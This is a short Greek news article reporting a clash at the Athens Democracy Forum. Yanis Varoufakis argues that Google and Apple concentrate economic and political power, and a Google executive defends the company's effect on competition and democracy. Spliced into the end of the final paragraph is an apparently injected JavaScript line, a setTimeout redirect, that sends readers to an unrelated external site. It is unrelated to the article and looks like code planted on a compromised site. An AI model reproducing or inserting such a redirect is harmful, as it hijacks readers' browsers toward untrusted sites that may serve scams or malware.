Καυγάς Βαρουφάκη με στέλεχος της Google σε φόρουμ

0
11

 

Στο πλαίσιο του Athens Democracy Forum ο πρώην υπουργός Οικονομικών Γιάνης Βαρουφάκης συμμετείχε σε εκδήλωση με άλλους ομιλητές όπου συντονιστής ήταν ο Νομπελίστας οικονομολόγο Πολ Κρούγκμαν. Οι τόνοι ανέβηκαν όταν ο Γιάνης Βαρουφάκης διαφώνησε με το στέλεχος της Google, Ρος Λα Ζενές για τις συνέπειες των νέων τεχνολογιών στον ανταγωνισμό και τη δημοκρατία.

«Η δημοκρατία αφορά τη διάχυση της ισχύος, αλλά στην εποχή της Google και της Apple, η τεχνολογία οδηγεί σε συρρίκνωση του ανταγωνισμού και σε τεράστια συγκέντρωση οικονομικής και πολιτικής ισχύος», τόνισε ο κ. Βαρουφάκης και το στέλεχος της Google απάντησε ότι οι υπηρεσίες που παρέχει η εταιρεία του έχουν συμβάλει πολύ θετικά στη διεύρυνση της δημοκρατίας.

«Στην Google τρέμουμε κάθε μέρα, καθώς δεν υπάρχουν φραγμοί εισόδου για νέες εταιρείες με έξυπνες ιδέες. Ο κλάδος είναι γεμάτος με τα πτώματα εταιρειών που κάποτε θεωρούνταν αήττητες», είπε χαρακτηριστικά το στέλεχος της Google που υποστήριξε επίσης πως η ψηφιακή επανάσταση έχει φέρει και στην οικονομία «αποκέντρωση της ισχύος», απάντησε στον Έλληνα πρώην υπουργό. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here